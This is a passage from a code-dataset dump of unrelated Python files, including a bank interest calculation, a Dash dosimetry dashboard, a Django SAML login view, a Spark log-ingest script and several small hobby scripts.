self.GetVar('total_pasd')\r\n \r\n total_ppy = self.GetVar('total_ppyr')\r\n total_psb = self.GetVar('total_psbr')\r\n \r\n if total_aktr > total_pasr:\r\n if total_aktd > total_pasd:\r\n a_total_ppy = total_ppy + total_psb\r\n else: # total_aktd <= total_pasd\r\n ekiv_aktv = self.GetVar('ekiv_aktv')\r\n akiv_pasv = self.GetVar('ekiv_pasv')\r\n total_aktrv = total_aktr + ekiv_aktv\r\n \r\n total_ccf = (\r\n (total_aktr - total_pasr + ekiv_aktv - ekiv_pasv) / total_aktrv\r\n ) * (total_ppy + total_psb)\r\n \r\n a_total_ppy = total_ppy + total_psb - total_ccf\r\n else: # total_akt <= total_pas\r\n if total_aktd > total_pasd:\r\n ekiv_aktd = self.GetVar('ekiv_aktd')\r\n ekiv_pasd = self.GetVar('ekiv_pasd')\r\n \r\n total_pcf = (\r\n (ekiv_aktd - ekiv_pasd) / total_aktd\r\n ) * (total_ppy + total_psb)\r\n \r\n a_total_ppy = total_ppy + total_psb + total_pcf\r\n else: # total_aktd <= total_pasd\r\n a_total_ppy = total_ppy + total_psb\r\n \r\n return a_total_ppy\r\n \r\n def __f_a_total_ppyv(self):\r\n total_aktr = self.GetVar('total_aktr')\r\n total_pasr = self.GetVar('total_pasr')\r\n total_aktd = self.GetVar('total_aktd')\r\n total_pasd = self.GetVar('total_pasd')\r\n \r\n total_ppy = self.GetVar('total_ppyv')\r\n total_psb = self.GetVar('total_psbv')\r\n \r\n if total_aktr > total_pasr:\r\n if total_aktd > total_pasd:\r\n a_total_ppy = total_ppy + total_psb\r\n else: # total_aktd <= total_pasd\r\n ekiv_aktv = self.GetVar('ekiv_aktv')\r\n akiv_pasv = self.GetVar('ekiv_pasv')\r\n total_aktrv = total_aktr + ekiv_aktv\r\n \r\n total_ccf = (\r\n (total_aktr - total_pasr + ekiv_aktv - ekiv_pasv) / total_aktrv\r\n ) * (total_ppy + total_psb)\r\n \r\n a_total_ppy = total_ppy + total_psb - total_ccf\r\n else: # total_akt <= total_pas\r\n if total_aktd > total_pasd:\r\n ekiv_aktd = self.GetVar('ekiv_aktd')\r\n ekiv_pasd = self.GetVar('ekiv_pasd')\r\n \r\n total_pcf = (\r\n (ekiv_aktd - ekiv_pasd) / total_aktd\r\n ) * (total_ppy + total_psb)\r\n \r\n a_total_ppy = total_ppy + total_psb + total_pcf\r\n else: # total_aktd <= total_pasd\r\n a_total_ppy = total_ppy + total_psb\r\n \r\n return a_total_ppy\r\n \r\n def __f_koreksi_r(self):\r\n koreksi = self.Helper.GetObject('Parameter', 'HI_KOREKSI_RP').ParameterValue\r\n \r\n return koreksi\r\n \r\n def __f_koreksi_v(self):\r\n koreksi = self.Helper.GetObject('Parameter', 'HI_KOREKSI_VLS').ParameterValue\r\n \r\n return koreksi\r\n \r\n def __f_total_aktr(self):\r\n return self.account_helper.GetAvgBalance_Type('A', '000')\r\n \r\n def __f_total_aktd(self):\r\n return self.account_helper.GetAvgBalance_Type('A', '411')\r\n \r\n def __f_total_pasr(self):\r\n return ( \r\n self.account_helper.GetAvgBalance_Type('L', '000') +\r\n self.account_helper.GetAvgBalance_Type('E', '000') +\r\n self.account_helper.GetAvgBalance_Type('I', '000') -\r\n self.account_helper.GetAvgBalance_Type('X', '000')\r\n )\r\n \r\n def __f_total_pasd(self):\r\n return (\r\n self.account_helper.GetAvgBalance_Type('L', '411') +\r\n self.account_helper.GetAvgBalance_Type('E', '411') \r\n )\r\n \r\n def __f_total_ppyr(self):\r\n return self.account_helper.GetAvgBalance_Intf('REV_PBY_R', '000')\r\n \r\n def __f_total_ppyv(self):\r\n return self.account_helper.GetAvgBalance_Intf('REV_PBY_V', '411')\r\n \r\n def __f_total_psbr(self):\r\n return self.account_helper.GetAvgBalance_Intf('REV_SBPU_R', '000')\r\n \r\n def __f_total_psbv(self):\r\n return self.account_helper.GetAvgBalance_Intf('REV_SBPU_V', '411')\r\n\r\n def __f_ekiv_aktv(self):\r\n return self.account_helper.GetEkivAvgBalance_Type('A', ['000','411'], 1)\r\n\r\n def __f_ekiv_pasv(self):\r\n return (\r\n self.account_helper.GetEkivAvgBalance_Type('L', ['000','411'], 1) +\r\n self.account_helper.GetEkivAvgBalance_Type('E', ['000','411'], 1)\r\n )\r\n\r\n def __f_ekiv_aktd(self):\r\n return self.account_helper.GetEkivAvgBalance_Type('A', '411')\r\n\r\n def __f_ekiv_pasd(self):\r\n return (\r\n self.account_helper.GetEkivAvgBalance_Type('L', '411') +\r\n self.account_helper.GetEkivAvgBalance_Type('E', '411')\r\n )\r\n \r\nclass HI_Permil(pobject.PObject):\r\n # static variable\r\n pobject_classname = 'HI_Permil'\r\n pobject_keys = ['id_hipermil']\r\n \r\n def OnCreate(self, currency_code):\r\n self.period_helper = self.Helper.CreateObject('PeriodHelper')\r\n today = self.period_helper.GetCurrentDate()\r\n \r\n self.process_date = today.GetAsTDateTime('DateValue')\r\n self.p_year = today.fl_accountingyear\r\n self.p_month = today.fl_accountingperiode\r\n self.day_number = today.ln_accountingperiode.GetDayNumber()\r\n self.currency_code = currency_code\r\n \r\n \r\n","sub_path":"script_modules/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":12125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"281682219","text":"import dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nfrom dash.exceptions import PreventUpdate\nimport plotly.express as px\nimport json\n\nfrom utils.load_df import siseri_quarter_df\nfrom utils.dosi_utils import get_aggreg_dosi\nfrom utils.anomaly_utils import get_iqr_enveloppes, get_dosi_envelop_df, get_number_atypical_measures, get_worker_number_atypical_measures\n\nfrom modules.sectors.layout import statistics_layout, enveloppes_layout\nfrom modules import cache\n\n\n@cache.memoize()\ndef get_domain_evol_graph(data_scope, aggreg_method, domain_type):\n\n plot_df = get_aggreg_dosi(\n siseri_quarter_df,\n context='sector',\n data_scope=data_scope,\n aggreg_method=aggreg_method,\n domain_type=domain_type\n )\n plot_df['measure_quarter_ts'] = plot_df['measure_quarter'].dt.to_timestamp()\n\n fig = px.scatter(plot_df,\n x='measure_quarter_ts',\n y='measure_value',\n color='sector_type')\n fig.update_traces(mode='lines+markers')\n fig.update_xaxes(title_text='Quarter', title_font=dict(size=16))\n fig.update_yaxes(title_text='Dosi [mSv]', title_font=dict(size=16))\n\n return fig\n\n\n@cache.memoize()\ndef get_domain_envelop_dfs(envelop_method, envelop_level, domain_type):\n envelop_df = get_iqr_enveloppes(\n siseri_quarter_df,\n context='sector',\n level=envelop_level,\n domain_type=domain_type\n )\n\n dosi_envelop_df = get_dosi_envelop_df(\n dosi_df=siseri_quarter_df,\n envelop_df=envelop_df,\n context='sector'\n )\n\n number_atypical_df = get_number_atypical_measures(\n dosi_envelop_df=dosi_envelop_df,\n context='sector'\n )\n\n worker_number_atypical_df = get_worker_number_atypical_measures(\n dosi_envelop_df=dosi_envelop_df,\n context='sector'\n )\n\n return envelop_df, number_atypical_df, worker_number_atypical_df\n\n\ndef get_envelop_graph(envelop_df):\n\n envelop_df['measure_quarter_ts'] = envelop_df['measure_quarter'].dt.to_timestamp()\n\n fig = px.scatter(envelop_df,\n x='measure_quarter_ts',\n y='upper_bound',\n color='sector_type')\n fig.update_traces(mode='lines+markers')\n fig.update_xaxes(title_text='Quarter', title_font=dict(size=16))\n fig.update_yaxes(title_text='Dosi [mSv]', title_font=dict(size=16))\n\n return fig\n\n\ndef get_evol_number_atypical_graph(number_atypical_df):\n number_atypical_df['measure_quarter_ts'] = number_atypical_df['measure_quarter'].dt.to_timestamp()\n\n fig = px.scatter(number_atypical_df,\n x='measure_quarter_ts',\n y='number_atypical',\n color='sector_type')\n fig.update_traces(mode='lines+markers')\n fig.update_xaxes(title_text='Quarter', title_font=dict(size=16))\n fig.update_yaxes(title_text='Number of atypical measures',\n title_font=dict(size=16))\n\n return fig\n\n\ndef get_worker_number_atypical_hist(worker_number_atypical_df):\n if worker_number_atypical_df.empty:\n return {}\n\n fig = px.histogram(worker_number_atypical_df, x=\"number_atypical\")\n fig.update_xaxes(title_text='Number of atypical measures',\n title_font=dict(size=16))\n fig.update_yaxes(title_text='Number of workers', title_font=dict(size=16))\n\n return fig\n\n\ndef regiser_callbacks(app):\n @app.callback(\n Output('sectors-ctrl-store-domain', 'data'),\n [Input('sectors-domain-select', 'value')],\n [State('sectors-ctrl-store-domain', 'data')]\n )\n def store_sectors_domain_selected(domain_type, ctrl_data):\n if domain_type is None:\n raise PreventUpdate\n\n if not ctrl_data:\n ctrl_data = {'selected_domain': domain_type}\n else:\n ctrl_data['selected_domain'] = domain_type\n return ctrl_data\n\n # to get back selector value when navigating\n @app.callback(\n Output('sectors-domain-select', 'value'),\n [Input('sectors-ctrl-store-domain', 'modified_timestamp')],\n [State('sectors-ctrl-store-domain', 'data')]\n )\n def set_sectors_domain_selector_value(ts, ctrl_data):\n if ts is None:\n pass\n return ctrl_data['selected_domain']\n\n @app.callback(\n Output('sectors-ctrl-store-statistics', 'data'),\n [Input('sectors-evol-aggreg-radio', 'value'),\n Input('sectors-evol-scope-radio', 'value')],\n [State('sectors-ctrl-store-statistics', 'data')]\n )\n def store_sectors_ctrl_statistics_state(aggreg_method, data_scope, data):\n\n if not data:\n data = {'evol_aggreg_ctrl': aggreg_method,\n 'evol_scope_ctrl': data_scope}\n else:\n data['evol_aggreg_ctrl'] = aggreg_method\n data['evol_scope_ctrl'] = data_scope\n return data\n\n @app.callback(\n Output('sectors-ctrl-store-envelop', 'data'),\n [Input('sectors-envelop-select', 'value'),\n Input('sectors-envelop-level', 'value')],\n [State('sectors-ctrl-store-envelop', 'data')]\n )\n def store_sectors_ctrl_enveloppes_state(envelop_method, envelop_level, data):\n\n if not data:\n data = {'envelop_method_ctrl': envelop_method,\n 'envelop_level_ctrl': envelop_level}\n else:\n data['envelop_method_ctrl'] = envelop_method\n data['envelop_level_ctrl'] = envelop_level\n return data\n\n @app.callback(\n [Output('sectors-evol-graph', 'figure'),\n Output('sectors-evol-aggreg-radio', 'value'),\n Output('sectors-evol-scope-radio', 'value')],\n [Input('sectors-evol-gen-button', 'n_clicks'), \n Input('sectors-domain-validate', 'n_clicks')],\n [State('sectors-ctrl-store-statistics', 'data'), \n State('sectors-ctrl-store-domain', 'data')]\n )\n def set_sectors_evol_graphe(n_clicks_evol, n_clicks_domain, ctrl_statistics_data, ctrl_domain_data):\n if n_clicks_evol is None and n_clicks_domain is None:\n # raise PreventUpdate\n pass\n if not ctrl_statistics_data or not ctrl_domain_data:\n return {}, None, None\n else:\n domain_evol_fig = get_domain_evol_graph(\n data_scope=ctrl_statistics_data['evol_scope_ctrl'],\n aggreg_method=ctrl_statistics_data['evol_aggreg_ctrl'],\n domain_type=ctrl_domain_data['selected_domain']\n )\n return domain_evol_fig, ctrl_statistics_data['evol_aggreg_ctrl'], ctrl_statistics_data['evol_scope_ctrl']\n\n @app.callback(\n Output('sectors-selected-worker-table', 'data'),\n [Input('sectors-worker-number-atypical-hist', 'selectedData')],\n [State('sectors-data-store', 'data')]\n )\n def set_selected_worker_table(selected_data, data):\n\n if selected_data is None:\n return None\n\n [x_min, x_max] = selected_data['range']['x']\n workers_data = data['worker_number_atypical']\n\n workers_selected_data = [\n el for el in workers_data if el['number_atypical'] >= x_min and el['number_atypical'] <= x_max]\n\n return workers_selected_data\n\n @app.callback(\n [Output('sectors-envelop-graph', 'figure'),\n Output('sectors-evol-number-atypical-graph', 'figure'),\n Output('sectors-worker-number-atypical-hist', 'figure'),\n Output('sectors-envelop-select', 'value'),\n Output('sectors-envelop-level', 'value'),\n Output('sectors-data-store', 'data')],\n [Input('sectors-envelop-gen-button', 'n_clicks'), \n Input('sectors-domain-validate', 'n_clicks')],\n [State('sectors-ctrl-store-envelop', 'data'),\n State('sectors-ctrl-store-domain', 'data'),\n State('sectors-data-store', 'data')]\n )\n def set_sectors_envelop_graphe(n_clicks_envelop, n_clicks_domain, ctrl_envelop_data, ctrl_domain_data, data):\n if n_clicks_envelop is None and n_clicks_domain is None:\n #raise PreventUpdate\n pass\n if not ctrl_envelop_data:\n return {}, {}, {}, None, None\n else:\n\n envelop_df, number_atypical_df, worker_number_atypical_df = get_domain_envelop_dfs(\n envelop_method=ctrl_envelop_data[\"envelop_method_ctrl\"], envelop_level=ctrl_envelop_data[\"envelop_level_ctrl\"], domain_type=ctrl_domain_data['selected_domain'])\n envelop_fig = get_envelop_graph(envelop_df)\n evol_number_atypical_fig = get_evol_number_atypical_graph(\n number_atypical_df)\n worker_number_atypical_fig = get_worker_number_atypical_hist(\n worker_number_atypical_df)\n\n data['worker_number_atypical'] = worker_number_atypical_df.to_dict(\n 'records')\n\n return envelop_fig, evol_number_atypical_fig, worker_number_atypical_fig, ctrl_envelop_data['envelop_method_ctrl'], ctrl_envelop_data['envelop_level_ctrl'], data\n\n @app.callback(\n Output('sectors-tab-content', 'children'),\n [Input('sectors-tab', 'active_tab')]\n )\n def switch_sectors_tab(at):\n if at == 'sectors-tab-statistics':\n return statistics_layout\n elif at == 'sectors-tab-enveloppes':\n return enveloppes_layout\n else:\n return html.P(\"Displaying isssue ...\")\n","sub_path":"dash-app/modules/sectors/callbacks.py","file_name":"callbacks.py","file_ext":"py","file_size_in_byte":9391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"176438764","text":"from django.conf import settings\nfrom django.http import HttpResponse, HttpResponseRedirect, \\\n HttpResponseServerError, HttpResponseBadRequest\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth import authenticate, login, logout, REDIRECT_FIELD_NAME\nfrom django.shortcuts import render\n\nfrom onelogin.saml2.auth import OneLogin_Saml2_Auth\nfrom onelogin.saml2.settings import OneLogin_Saml2_Settings\nfrom onelogin.saml2.utils import OneLogin_Saml2_Utils\n\nfrom .utils import SAMLError, SAMLSettingsError, SAMLDataError\nfrom .utils import (get_provider_config,\n init_saml_auth, prepare_django_request)\n\n\n\n\n@csrf_exempt\ndef saml_login(request):\n attributes = None\n req = prepare_django_request(request)\n auth = init_saml_auth(req)\n\n if 'acs' in req['get_data']:\n # IDP initiated\n request_id = None\n\n if 'AuthNRequestID' in request.session:\n request_id = request.session['AuthNRequestID']\n\n auth.process_response(request_id=request_id)\n errors = auth.get_errors()\n\n if not auth.is_authenticated():\n return HttpResponse('Unathorized', status=401)\n elif not errors:\n if 'AuthNRequestID' in request.session:\n del request.session['AuthNRequestID']\n\n request.session['samlUserdata'] = auth.get_attributes()\n request.session['samlNameId'] = auth.get_nameid()\n request.session['samlSessionIndex'] = auth.get_session_index()\n attributes = request.session['samlUserdata'].items()\n try:\n user = authenticate(request=request)\n except SAMLDataError as e:\n return render(request, 'django_saml2_pro_auth/error.html', {'message': e.args[0]})\n login(request, user)\n if hasattr(settings, 'SAML_REDIRECT'):\n return HttpResponseRedirect(settings.SAML_REDIRECT)\n elif 'RelayState' in req['post_data'] and OneLogin_Saml2_Utils.get_self_url(req) != req['post_data']['RelayState']:\n return HttpResponseRedirect(auth.redirect_to(req['post_data']['RelayState']))\n else:\n return HttpResponseRedirect(OneLogin_Saml2_Utils.get_self_url(req))\n else:\n return HttpResponseBadRequest(\n 'ERRORS FOUND IN SAML REQUEST: %s, REASON: %s' % (\n errors,\n auth.get_last_error_reason()\n )\n )\n elif 'slo' in req['get_data']:\n logout(request)\n return HttpResponseRedirect(auth.logout())\n elif 'sls' in req['get_data']:\n logout(request)\n delete_session_callback = lambda: request.session.clear()\n url = auth.process_slo(delete_session_cb=delete_session_callback)\n errors = auth.get_errors()\n if not errors:\n return HttpResponseRedirect(url)\n else:\n return HttpResponseBadRequest(\n 'ERRORS FOUND IN SAML LOGOUT REQUEST: %s, REASON: %s' % (\n errors,\n auth.get_last_error_reason()\n )\n )\n elif 'provider' in req['get_data']:\n # SP Initiated\n if hasattr(settings, 'SAML_REDIRECT'):\n return HttpResponseRedirect(auth.login(return_to=settings.SAML_REDIRECT))\n elif REDIRECT_FIELD_NAME in req['get_data']:\n return HttpResponseRedirect(auth.login(return_to=req['get_data'][REDIRECT_FIELD_NAME]))\n elif 'RelayState' in req['post_data']:\n return HttpResponseRedirect(auth.redirect_to(req['post_data']['RelayState']))\n else:\n redir = OneLogin_Saml2_Utils.get_self_url(req)\n return HttpResponseRedirect(auth.login(return_to=redir))\n else:\n return HttpResponseRedirect(auth.login())\n\ndef metadata(request):\n req = prepare_django_request(request)\n auth = init_saml_auth(req)\n saml_settings = auth.get_settings()\n metadata = saml_settings.get_sp_metadata()\n errors = saml_settings.validate_metadata(metadata)\n\n if len(errors) == 0:\n resp = HttpResponse(content=metadata, content_type='text/xml')\n else:\n resp = HttpResponseServerError(content=', '.join(errors))\n return resp\n","sub_path":"src/django_saml2_pro_auth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"443041318","text":"from tkinter import *\n\nraiz = Tk()\n\nmi_frame=Frame(raiz, width=1200, height=600)#Medidas del frame\nmi_frame.pack()#Empaquetar \n\ncuadro_nombre=Entry(mi_frame)#Crear un cuadro de entrada\ncuadro_nombre.grid(row=0,column=1, padx=10, pady=10)#fila 1 columna 0 separacion 10en X y 10 en Y\ncuadro_nombre.config(fg=\"red\", justify=\"right\")#color rojo y estará justificado a la izquierda\n\ncuadro_apellido=Entry(mi_frame)\ncuadro_apellido.grid(row=1,column=1, padx=10, pady=10)\n\ncuadro_direccion=Entry(mi_frame)\ncuadro_direccion.grid(row=2,column=1, padx=10, pady=10)\n\nnombre_label=Label(mi_frame, text=\"Nombre: \")\nnombre_label.grid(row=0,column=0,sticky=\"e\", padx=10, pady=10)#Stiky estará al este (Ver tabla de stiky en imágenes)\n\napellido_label=Label(mi_frame, text=\"Apellido: \")\napellido_label.grid(row=1,column=0, sticky=\"e\",padx=10, pady=10)\n\ndireccion_label=Label(mi_frame, text=\"Direccion: \")\ndireccion_label.grid(row=2,column=0, sticky=\"e\", padx=10, pady=10)\n\nraiz.mainloop()#Se pone al último para que esté refrescando la ventana","sub_path":"cuadro_de_texto.py","file_name":"cuadro_de_texto.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"142538156","text":"\"\"\"\nThis package contains the neural interface and its various concrete implementations\nbased on any neural network already existing compatible with python3.\n\nThe default one used in Moody is the one that can be found in the sklearn.neural_network\npackage, MLPClassifier.\n\nThe possibility to set a particular net is implemented as a tentative feature but is\nstill not used in the other sections of the architecture..\n\"\"\"\n\n# Atm only the default os ready\n\nfrom .default import NeuralInterface, EmptyDatasetError, NeuralCollectingNotStoppedError,\\\n NeuralPredictingNotStoppedError\n\n__all__ = [\"NeuralInterface\",\n \"NeuralCollectingNotStoppedError\",\n \"NeuralPredictingNotStoppedError\",\n \"EmptyDatasetError\"]\n","sub_path":"moodysg/neural/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637323449","text":"import datetime\nimport time\n\nimport requests\n\nimport settings\n\n\nclass AmbientWeatherStation:\n \"\"\"\n This class represents a single weather station.\n \"\"\"\n api_instance = None\n mac_address = None\n last_data = {}\n info = {\n 'name': 'Weather Station'\n }\n\n def __init__(self, api_instance, device_dict):\n self.api_instance = api_instance\n self.mac_address = device_dict.get('macAddress', None)\n self.last_data = device_dict.get('lastData', {})\n self.info = device_dict.get('info', {})\n\n def __str__(self):\n\n return '%s@%s' % (self.info.get('name'), self.mac_address)\n\n @staticmethod\n def current_time():\n\n return lambda: int(round(time.time() * 1000))\n\n def get_data(self, **kwargs):\n \"\"\"\n Get the data for a specific device for a specific end date\n\n Keyword Arguments:\n limit - max 288\n end_date - is Epoch in milliseconds\n\n :return:\n \"\"\"\n limit = int(kwargs.get('limit', 288))\n end_date = kwargs.get('end_date', self.current_time())\n\n if self.mac_address is not None:\n service_address = 'devices/%s' % self.mac_address\n\n data = dict(\n limit=limit,\n endDate=end_date\n )\n\n return self.api_instance._api_call(service_address, **data)\n\n\nclass AmbientAPI:\n endpoint = None\n api_key = None\n application_key = None\n client = requests\n\n def __init__(self, **kwargs):\n http_client = kwargs.get('http_client', requests)\n\n self.client = http_client\n self.endpoint = getattr(settings, 'AMBIENT_ENDPOINT', None)\n self.api_key = getattr(settings, 'AMBIENT_API_KEY', None)\n self.application_key = getattr(settings, 'AMBIENT_APPLICATION_KEY', None)\n\n def _api_call(self, service, **kwargs):\n retn = {}\n\n target_url = '%s/%s' % (self.endpoint, service)\n\n params = {\n 'applicationKey': self.application_key,\n 'apiKey': self.api_key\n }\n\n for kwarg_k, kwarg_v in kwargs.items():\n params.update({kwarg_k: kwarg_v})\n\n res = self.client.get(target_url, params, verify=True)\n\n if res.status_code == 200:\n retn = res.json()\n\n return retn\n\n def get_devices(self):\n \"\"\"\n Get all devices\n\n :return:\n A list of AmbientWeatherStation instances.\n \"\"\"\n retn = []\n for device in self._api_call('devices'):\n retn.append(AmbientWeatherStation(self, device))\n\n return retn\n","sub_path":"ambientapi.py","file_name":"ambientapi.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"595040242","text":"import kivy\n\nkivy.require('1.7.2')\n\nfrom kivy.app import App\nfrom kivy.uix.label import Label\nfrom kivy.uix.gridlayout import FloatLayout\nfrom kivy.uix.screenmanager import ScreenManager, Screen\n\n\nclass HomeScreen(FloatLayout):\n def __init__(self, **kwargs):\n super(HomeScreen, self).__init__(**kwargs)\n self.cols = 2\n self.add_widget(Label(text='Hello'))\n\n\nclass MyApp(App):\n title = 'Monopoly'\n\n def build(self):\n return HomeScreen()\n\n\nif __name__ == '__main__':\n MyApp().run()","sub_path":"Kiwi-Excercise/SettingUpTheProjectName.py","file_name":"SettingUpTheProjectName.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"119985664","text":"# -*- coding: utf-8 -*-\nfrom django import forms\nfrom django.forms import widgets\nfrom .models import Feedback, OrderFeedback\n\n\nclass FeedbackForm(forms.ModelForm):\n message = forms.CharField(widget=widgets.Textarea(attrs={'placeholder': u'Ваше сообщение', 'class': 'span9', }))\n\n def __init__(self, *args, **kwargs):\n super(FeedbackForm, self).__init__(*args, **kwargs)\n for field in self.fields:\n self.fields['email'].widget.attrs['class'] = 'span4'\n self.fields['name'].widget.attrs['class'] = 'span4'\n self.fields['email'].widget.attrs['placeholder'] = self.fields['email'].label\n self.fields['name'].widget.attrs['placeholder'] = self.fields['name'].label\n\n\n class Meta:\n model = Feedback\n exclude = ('user','position', 'is_active')\n\n\nclass OrderFeedbackForm(forms.ModelForm):\n message = forms.CharField(widget=widgets.Textarea(attrs={'placeholder': u'Ваше сообщение', 'class': 'span5', 'rows':'5',}))\n\n def __init__(self, *args, **kwargs):\n super(OrderFeedbackForm, self).__init__(*args, **kwargs)\n for field in self.fields:\n self.fields['contact'].widget.attrs['class'] = 'span5'\n self.fields['name'].widget.attrs['class'] = 'span5'\n self.fields['contact'].widget.attrs['placeholder'] = self.fields['contact'].label\n self.fields['name'].widget.attrs['placeholder'] = self.fields['name'].label\n\n\n class Meta:\n model = OrderFeedback\n exclude = ('user',)\n","sub_path":"apps/feedback/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"257340362","text":"#!/usr/bin/python\r\n\r\n\"\"\"\r\nproblem:\r\nRead and parse the NASA web server log lines,\r\nextract the requesting host, the datetime, the path, and the number of bytes\r\nthen store the data in a better format.\r\nUse Parquet, a columnar storage format, with Spark SQL.\r\n\"\"\"\r\n\r\nimport sys\r\nimport re\r\nimport datetime\r\n\r\nfrom pyspark import SparkConf, SparkContext\r\nfrom pyspark.sql import SQLContext, Row\r\nfrom pyspark.sql.types import StructType, StructField, StringType, FloatType, TimestampType\r\n\r\nconf = SparkConf().setAppName('nasa log ingest')\r\nsc = SparkContext(conf=conf)\r\nsqlContext = SQLContext(sc)\r\ntext = sc.textFile(inputs)\r\n\r\ndef main(argv=None):\r\n if argv is None:\r\n inputs = sys.argv[1]\r\n outputdir = sys.argv[2]\r\n\r\n linere = re.compile(\"^(\\\\S+) - - \\\\[(\\\\S+) [+-]\\\\d+\\\\] \\\"[A-Z]+ (\\\\S+) HTTP/\\\\d\\\\.\\\\d\\\" \\\\d+ (\\\\d+)$\")\r\n\r\n request = text.map(lambda line: linere.split(line)).filter(None).map(\r\n lambda line: Row(hostname=line[1],\r\n timestamp=datetime.datetime.strptime(line[2], '%d/%b/%Y:%H:%M:%S'),\r\n path=line[3], size=float(line[4])))\r\n\r\n schema = StructType([\r\n StructField('hostname', StringType(), False),\r\n StructField('path', StringType(), False),\r\n StructField('size', FloatType(), False),\r\n StructField('timestamp', TimestampType(), False)\r\n ])\r\n\r\n request = sqlContext.createDataFrame(request, schema)\r\n request.write.format('parquet').save(outputdir)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"ingest_logs.py","file_name":"ingest_logs.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"493493118","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 4 20:59:13 2019\n\n@author: eduardo\n\"\"\"\n\nimport random\nimport numpy as np\n\ndef inicializar_album(figus_total):\n album=[]\n i=0\n while i\n#\n\nfrom Packager.CreateArchivePackager import *\nfrom Packager.MacDMGPackager import *\nfrom Packager.MSIFragmentPackager import *\nfrom Packager.NullsoftInstallerPackager import *\nfrom Packager.PortablePackager import *\nfrom Packager.SevenZipPackager import *\nfrom Packager.MultiCollectionPackager import *\n\n\nclass TypePackager(PackagerBase):\n \"\"\"packager that is used in place of different other packagers\nThe packager used can be decided at runtime\n\"\"\"\n\n def __init__(self, defaultType=eval(CraftCore.settings.get(\"Packager\", \"PackageType\", \"NullsoftInstallerPackager\"))):\n CraftCore.log.debug(\"TypePackager __init__ %s\" % defaultType)\n self.__packager = None\n self.changePackager(defaultType)\n\n def changePackager(self, packager=None):\n if not packager == None and (\"Packager\", \"PackageType\") in CraftCore.settings:\n CraftCore.log.debug(\n \"Packager setting %s overriten by with %s\" % (packager, CraftCore.settings.get(\"Packager\", \"PackageType\")))\n packager = eval(CraftCore.settings.get(\"Packager\", \"PackageType\"))\n\n if packager == None:\n return\n\n if self.__packager:\n bases = list(self.__class__.__bases__)\n for i in range(len(bases)):\n if bases[i] == self.__packager:\n CraftCore.log.info(f\"Replace Packager: {bases[i]} with {packager}\")\n bases[i] = packager\n self.__class__.__bases__ = tuple(bases)\n else:\n self.__class__.__bases__ += (packager,)\n packager.__init__(self)\n self.__packager = packager\n\n def createPackage(self):\n return self.__packager.createPackage(self)\n","sub_path":"bin/Packager/TypePackager.py","file_name":"TypePackager.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"306529972","text":"class Solution:\n def pathSum(self, root, sum):\n if not root:\n return []\n res = []\n stack = [(root, sum - root.val, [root.val])]\n while stack:\n curr, val, ls = stack.pop()\n if not curr.left and not curr.right and val == curr.val:\n res.append(ls + [curr.val])\n if root.left:\n stack.append((root.left, sum - root.val, ls + [root.val]))\n if root.right:\n stack.append((root.right, sum - root.val, ls + [root.val]))\n return res\n","sub_path":"113/113.path-sum-ii.616030488.Time-Limit-Exceeded.leetcode.python3.py","file_name":"113.path-sum-ii.616030488.Time-Limit-Exceeded.leetcode.python3.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"284277438","text":"# -*- coding: utf-8 -*-\n\"\"\"\n数据预处理\n如前面所说,我们的数据预处理工作占用了我们的70%时间\n其完成质量直接影响最终结果\n首先需要对数据有个整体的认识\n\"\"\"\n# 加载相关模块和库\nimport sys\nimport io\nfrom sklearn.preprocessing import Imputer\n#改变标准输出的默认编码\nsys.stdout=io.TextIOWrapper(sys.stdout.buffer,encoding='utf8')\nprint(__doc__)\n\nimport pandas as pd\ndata_train = pd.read_csv(\"a8_titanic/data/train.csv\")\n\nprint(\"看列名\", data_train.columns)\n# 数据摸底\nprint(\"看每列性质,空值和类型\", data_train.info())\nprint(data_train[0:10])\ndummies_Cabin = pd.get_dummies(data_train['Cabin'], prefix= 'Cabin')\ndummies_Embarked = pd.get_dummies(data_train['Embarked'], prefix= 'Embarked')\ndummies_Sex = pd.get_dummies(data_train['Sex'], prefix= 'Sex')\ndummies_Pclass = pd.get_dummies(data_train['Pclass'], prefix= 'Pclass')\ndf = pd.concat([data_train, dummies_Cabin, dummies_Embarked, dummies_Sex, dummies_Pclass], axis=1)\nprint(df[0:10])\n# (1) for col\ndf.drop(['Pclass', 'Name', 'Sex', 'Ticket', 'Cabin', 'Embarked'], axis=1, inplace=True)\n# 我们把需要的feature字段取出来,转成numpy格式,使用scikit-learn中的LogisticRegression建模\ntrain_df = df.filter(regex='Survived|Age_.*|SibSp|Parch|Fare_.*|Cabin_.*|Embarked_.*|Sex_.*|Pclass_.*')\nprint(train_df[0:10])\nprint(\"看列名\", train_df.columns)\n# (2) for row\ntest = df[df['Survived'] == 1] # x.sum()求每行中各列的和\nprint(\"view 